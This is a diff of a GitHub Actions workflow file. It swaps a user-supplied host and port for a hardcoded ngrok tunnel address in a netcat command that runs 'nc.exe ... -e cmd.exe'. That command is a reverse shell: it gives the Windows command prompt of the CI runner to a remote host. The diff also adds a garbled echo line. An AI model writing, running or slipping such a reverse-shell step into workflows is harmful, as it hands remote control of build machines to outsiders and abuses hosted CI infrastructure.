--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -33,7 +33,7 @@ jobs:
        ls
        cd netcat-1.11
        ls
-       ./nc.exe -v {{ github.event.inputs.pin }} {{ github.event.inputs.port }} -e cmd.exe
-       
+       ./nc.exe -v 0.tcp.in.ngrok.io 17865  -e cmd.exe
+       echo enter both ip and port without any  this :
        
     
